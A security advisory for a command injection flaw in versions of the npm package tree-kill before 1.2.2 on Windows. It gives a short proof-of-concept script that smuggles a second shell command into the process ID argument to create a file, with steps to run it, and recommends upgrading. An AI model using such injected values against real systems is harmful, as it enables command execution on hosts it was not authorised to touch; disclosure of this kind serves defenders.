Vulnerability	Vulnerable Version
H Command Injection tree-kill is a package to kill all processes in the process tree, including the root process. Affected versions of this package are vulnerable to Command Injection. User input is concatenated with a `command` within `tree-kill` and `treekill` that will be executed without any check. Note: This vulnerability is only applicable if the package is used on a Windows operating system. PoC by mik317 Create this POC file `//poc.js var kill = require('tree-kill'); kill('3333332 & echo "HACKED" > HACKED.txt & ');` Execute the following commands in another terminal: `npm i tree-kill # Install affected module dir # Check HACKED.txt doesn't exist node poc.js # Run the PoC dir # Now HACKED.txt exists :)` A new file called `HACKED.txt` will be created, containing the `HACKED` string How to fix Command Injection? Upgrade `tree-kill` to version 1.2.2 or higher.	<1.2.2

Command Injection

tree-kill is a package to kill all processes in the process tree, including the root process.

Affected versions of this package are vulnerable to Command Injection. User input is concatenated with a command within tree-kill and treekill that will be executed without any check.

Note: This vulnerability is only applicable if the package is used on a Windows operating system.

PoC by mik317

Create this POC file

//poc.js
var kill = require('tree-kill');
kill('3333332 & echo "HACKED" > HACKED.txt & ');

Execute the following commands in another terminal:

npm i tree-kill # Install affected module
dir # Check *HACKED.txt* doesn't exist
node poc.js #  Run the PoC
dir # Now *HACKED.txt* exists :)

A new file called HACKED.txt will be created, containing the HACKED string

How to fix Command Injection?

Upgrade tree-kill to version 1.2.2 or higher.

<1.2.2

Go back to all versions of this package